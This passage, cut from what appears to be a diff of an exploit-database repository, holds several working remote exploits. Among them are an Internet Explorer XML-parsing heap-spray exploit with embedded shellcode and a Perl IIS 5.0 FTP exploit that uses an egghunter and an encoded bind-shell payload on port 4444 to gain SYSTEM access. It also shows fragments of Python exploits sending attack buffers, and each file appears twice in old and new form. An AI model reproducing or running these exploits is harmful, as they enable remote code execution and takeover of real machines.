"\x50\x32\x48\x6c\x6d\x6e\x39\x45\x55\x58\x4e\x61\x43\x69\x6f\x6a"
"\x76\x53\x5a\x39\x6f\x4b\x4f\x46\x57\x69\x6f\x6a\x70\x4e\x6b\x73"
"\x67\x49\x6c\x6d\x53\x49\x54\x70\x64\x6b\x4f\x4b\x66\x61\x42\x6b"
"\x4f\x48\x50\x33\x58\x4a\x4f\x58\x4e\x6d\x30\x35\x30\x33\x63\x4b"
"\x4f\x6b\x66\x79\x6f\x58\x50\x68")
buffer+="\r\n\r\n"
expl.send (buffer)
expl.close()
print "[+] Payload Sent, ph33r."
# milw0rm.com [2007-12-12]

6
platforms/windows/remote/663.py
View file

@ -42,6 +42,6 @@ sleep(3)
s.send('A001 SELECT ' + buffer+'\r\n')
data = s.recv(1024)
s.close()
print "\nDone! "
# milw0rm.com [2004-11-29]
print "\nDone! "
# milw0rm.com [2004-11-29]

110
platforms/windows/remote/7410.htm
View file

@ -1,55 +1,55 @@
<html>
<script>
// k`sOSe 12/10/2008
// Tested on Vista SP1, Explorer 7.0.6001.18000 and Vista SP0, Explorer 7.0.6000.16386
// Heap spray address adjusted for Vista - muts / offensive-security.com
// http://secmaniac.blogspot.com/2008/12/ms-internet-explorer-xml-parsing-remote.html
// http://www.offensive-security.com/0day/iesploit-vista.rar
// windows/exec - 141 bytes
// http://www.metasploit.com
// EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
var block = unescape("%u0c0c%u0c0c");
var nops = unescape("%u9090%u9090%u9090");
while (block.length < 81920) block += block;
var memory = new Array();
var i=0;
for (;i<1000;i++) memory[i] += (block + nops + shellcode);
document.write("<iframe src=\"iframe.html\">");
</script>
</html>
<!-- iframe.html
<XML ID=I>
<X>
<C>
<![CDATA[
<image
SRC=http://&#3084;&#3084;.xxxxx.org
>
]]>
</C>
</X>
</XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<XML ID=I>
</XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
</SPAN>
</SPAN>
-->
# milw0rm.com [2008-12-10]
<html>
<script>
// k`sOSe 12/10/2008
// Tested on Vista SP1, Explorer 7.0.6001.18000 and Vista SP0, Explorer 7.0.6000.16386
// Heap spray address adjusted for Vista - muts / offensive-security.com
// http://secmaniac.blogspot.com/2008/12/ms-internet-explorer-xml-parsing-remote.html
// http://www.offensive-security.com/0day/iesploit-vista.rar
// windows/exec - 141 bytes
// http://www.metasploit.com
// EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
var block = unescape("%u0c0c%u0c0c");
var nops = unescape("%u9090%u9090%u9090");
while (block.length < 81920) block += block;
var memory = new Array();
var i=0;
for (;i<1000;i++) memory[i] += (block + nops + shellcode);
document.write("<iframe src=\"iframe.html\">");
</script>
</html>
<!-- iframe.html
<XML ID=I>
<X>
<C>
<![CDATA[
<image
SRC=http://&#3084;&#3084;.xxxxx.org
>
]]>
</C>
</X>
</XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<XML ID=I>
</XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
</SPAN>
</SPAN>
-->
# milw0rm.com [2008-12-10]

288
platforms/windows/remote/9559.pl
View file

@ -1,144 +1,144 @@
#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444
# http://www.offensive-security.com/0day/msftp.pl.txt
use IO::Socket;
$|=1;
$sc = "\x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x43" .
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" .
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" .
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" .
"\x50\x38\x41\x43\x4a\x4a\x49\x45\x36\x4d\x51\x48\x4a\x4b\x4f" .
"\x44\x4f\x47\x32\x46\x32\x42\x4a\x43\x32\x46\x38\x48\x4d\x46" .
"\x4e\x47\x4c\x45\x55\x51\x4a\x44\x34\x4a\x4f\x48\x38\x46\x34" .
"\x50\x30\x46\x50\x50\x57\x4c\x4b\x4b\x4a\x4e\x4f\x44\x35\x4a" .
"\x4a\x4e\x4f\x43\x45\x4b\x57\x4b\x4f\x4d\x37\x41\x41";
# ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
$shell="T00WT00W" ."\xda\xde\xbd\x2d\xe7\x9b\x9f\x2b\xc9\xb1\x56\xd9\x74\x24\xf4" .
"\x5a\x83\xea\xfc\x31\x6a\x15\x03\x6a\x15\xcf\x12\x67\x77\x86" .
"\xdd\x98\x88\xf8\x54\x7d\xb9\x2a\x02\xf5\xe8\xfa\x40\x5b\x01" .
"\x71\x04\x48\x92\xf7\x81\x7f\x13\xbd\xf7\x4e\xa4\x70\x38\x1c" .
"\x66\x13\xc4\x5f\xbb\xf3\xf5\xaf\xce\xf2\x32\xcd\x21\xa6\xeb" .
"\x99\x90\x56\x9f\xdc\x28\x57\x4f\x6b\x10\x2f\xea\xac\xe5\x85" .
"\xf5\xfc\x56\x92\xbe\xe4\xdd\xfc\x1e\x14\x31\x1f\x62\x5f\x3e" .
"\xeb\x10\x5e\x96\x22\xd8\x50\xd6\xe8\xe7\x5c\xdb\xf1\x20\x5a" .
"\x04\x84\x5a\x98\xb9\x9e\x98\xe2\x65\x2b\x3d\x44\xed\x8b\xe5" .
"\x74\x22\x4d\x6d\x7a\x8f\x1a\x29\x9f\x0e\xcf\x41\x9b\x9b\xee" .
"\x85\x2d\xdf\xd4\x01\x75\xbb\x75\x13\xd3\x6a\x8a\x43\xbb\xd3" .
"\x2e\x0f\x2e\x07\x48\x52\x27\xe4\x66\x6d\xb7\x62\xf1\x1e\x85" .
"\x2d\xa9\x88\xa5\xa6\x77\x4e\xc9\x9c\xcf\xc0\x34\x1f\x2f\xc8" .
"\xf2\x4b\x7f\x62\xd2\xf3\x14\x72\xdb\x21\xba\x22\x73\x9a\x7a" .
"\x93\x33\x4a\x12\xf9\xbb\xb5\x02\x02\x16\xc0\x05\xcc\x42\x80" .
"\xe1\x2d\x75\x36\xad\xb8\x93\x52\x5d\xed\x0c\xcb\x9f\xca\x84" .
"\x6c\xe0\x38\xb9\x25\x76\x74\xd7\xf2\x79\x85\xfd\x50\xd6\x2d" .
"\x96\x22\x34\xea\x87\x34\x11\x5a\xc1\x0c\xf1\x10\xbf\xdf\x60" .
"\x24\xea\x88\x01\xb7\x71\x49\x4c\xa4\x2d\x1e\x19\x1a\x24\xca" .
"\xb7\x05\x9e\xe9\x4a\xd3\xd9\xaa\x90\x20\xe7\x33\x55\x1c\xc3" .
"\x23\xa3\x9d\x4f\x10\x7b\xc8\x19\xce\x3d\xa2\xeb\xb8\x97\x19" .
"\xa2\x2c\x6e\x52\x75\x2b\x6f\xbf\x03\xd3\xc1\x16\x52\xeb\xed" .
"\xfe\x52\x94\x10\x9f\x9d\x4f\x91\xbf\x7f\x5a\xef\x57\x26\x0f" .
"\x52\x3a\xd9\xe5\x90\x43\x5a\x0c\x68\xb0\x42\x65\x6d\xfc\xc4" .
"\x95\x1f\x6d\xa1\x99\x8c\x8e\xe0\x90";
print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
if ($#ARGV ne 1) {
print "usage: iiz5.pl <target> <your local ip>\n";
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '21',
Proto => 'tcp');
$patch = "\x7E\xF1\xFA\x7F";
$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms
$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
# top address of stack frame where shellcode resides, is hardcoded inside this block
$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";
# attack buffer
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
"HHHHIIII".
$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
$x = <$sock>;
print $x;
print $sock "USER anonimoos\r\n";
$x = <$sock>;
print $x;
print $sock "PASS $shell\r\n";
$x = <$sock>;
print $x;
print $sock "USER anonimoos\r\n";
$x = <$sock>;
print $x;
print $sock "PASS $shell\r\n";
$x = <$sock>;
print $x;
print $sock "USER anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "PASS anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "MKD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "CWD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "MKD CCC". "$c\r\n";
$x = <$sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/\r\n";
$x = <$sock>;
print $x;
while (1) {}
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope
# milw0rm.com [2009-09-01]
#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444
# http://www.offensive-security.com/0day/msftp.pl.txt
use IO::Socket;
$|=1;
$sc = "\x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x43" .
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" .
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" .
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" .
"\x50\x38\x41\x43\x4a\x4a\x49\x45\x36\x4d\x51\x48\x4a\x4b\x4f" .
"\x44\x4f\x47\x32\x46\x32\x42\x4a\x43\x32\x46\x38\x48\x4d\x46" .
"\x4e\x47\x4c\x45\x55\x51\x4a\x44\x34\x4a\x4f\x48\x38\x46\x34" .
"\x50\x30\x46\x50\x50\x57\x4c\x4b\x4b\x4a\x4e\x4f\x44\x35\x4a" .
"\x4a\x4e\x4f\x43\x45\x4b\x57\x4b\x4f\x4d\x37\x41\x41";
# ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
$shell="T00WT00W" ."\xda\xde\xbd\x2d\xe7\x9b\x9f\x2b\xc9\xb1\x56\xd9\x74\x24\xf4" .
"\x5a\x83\xea\xfc\x31\x6a\x15\x03\x6a\x15\xcf\x12\x67\x77\x86" .
"\xdd\x98\x88\xf8\x54\x7d\xb9\x2a\x02\xf5\xe8\xfa\x40\x5b\x01" .
"\x71\x04\x48\x92\xf7\x81\x7f\x13\xbd\xf7\x4e\xa4\x70\x38\x1c" .
"\x66\x13\xc4\x5f\xbb\xf3\xf5\xaf\xce\xf2\x32\xcd\x21\xa6\xeb" .
"\x99\x90\x56\x9f\xdc\x28\x57\x4f\x6b\x10\x2f\xea\xac\xe5\x85" .
"\xf5\xfc\x56\x92\xbe\xe4\xdd\xfc\x1e\x14\x31\x1f\x62\x5f\x3e" .
"\xeb\x10\x5e\x96\x22\xd8\x50\xd6\xe8\xe7\x5c\xdb\xf1\x20\x5a" .
"\x04\x84\x5a\x98\xb9\x9e\x98\xe2\x65\x2b\x3d\x44\xed\x8b\xe5" .
"\x74\x22\x4d\x6d\x7a\x8f\x1a\x29\x9f\x0e\xcf\x41\x9b\x9b\xee" .
"\x85\x2d\xdf\xd4\x01\x75\xbb\x75\x13\xd3\x6a\x8a\x43\xbb\xd3" .
"\x2e\x0f\x2e\x07\x48\x52\x27\xe4\x66\x6d\xb7\x62\xf1\x1e\x85" .
"\x2d\xa9\x88\xa5\xa6\x77\x4e\xc9\x9c\xcf\xc0\x34\x1f\x2f\xc8" .
"\xf2\x4b\x7f\x62\xd2\xf3\x14\x72\xdb\x21\xba\x22\x73\x9a\x7a" .
"\x93\x33\x4a\x12\xf9\xbb\xb5\x02\x02\x16\xc0\x05\xcc\x42\x80" .
"\xe1\x2d\x75\x36\xad\xb8\x93\x52\x5d\xed\x0c\xcb\x9f\xca\x84" .
"\x6c\xe0\x38\xb9\x25\x76\x74\xd7\xf2\x79\x85\xfd\x50\xd6\x2d" .
"\x96\x22\x34\xea\x87\x34\x11\x5a\xc1\x0c\xf1\x10\xbf\xdf\x60" .
"\x24\xea\x88\x01\xb7\x71\x49\x4c\xa4\x2d\x1e\x19\x1a\x24\xca" .
"\xb7\x05\x9e\xe9\x4a\xd3\xd9\xaa\x90\x20\xe7\x33\x55\x1c\xc3" .
"\x23\xa3\x9d\x4f\x10\x7b\xc8\x19\xce\x3d\xa2\xeb\xb8\x97\x19" .
"\xa2\x2c\x6e\x52\x75\x2b\x6f\xbf\x03\xd3\xc1\x16\x52\xeb\xed" .
"\xfe\x52\x94\x10\x9f\x9d\x4f\x91\xbf\x7f\x5a\xef\x57\x26\x0f" .
"\x52\x3a\xd9\xe5\x90\x43\x5a\x0c\x68\xb0\x42\x65\x6d\xfc\xc4" .
"\x95\x1f\x6d\xa1\x99\x8c\x8e\xe0\x90";
print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
if ($#ARGV ne 1) {
print "usage: iiz5.pl <target> <your local ip>\n";
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '21',
Proto => 'tcp');
$patch = "\x7E\xF1\xFA\x7F";
$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms
$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
# top address of stack frame where shellcode resides, is hardcoded inside this block
$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";
# attack buffer
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
"HHHHIIII".
$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
$x = <$sock>;
print $x;
print $sock "USER anonimoos\r\n";
$x = <$sock>;
print $x;
print $sock "PASS $shell\r\n";
$x = <$sock>;
print $x;
print $sock "USER anonimoos\r\n";
$x = <$sock>;
print $x;
print $sock "PASS $shell\r\n";
$x = <$sock>;
print $x;
print $sock "USER anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "PASS anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "MKD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "CWD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "MKD CCC". "$c\r\n";
$x = <$sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/\r\n";
$x = <$sock>;
print $x;
while (1) {}
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope
# milw0rm.com [2009-09-01]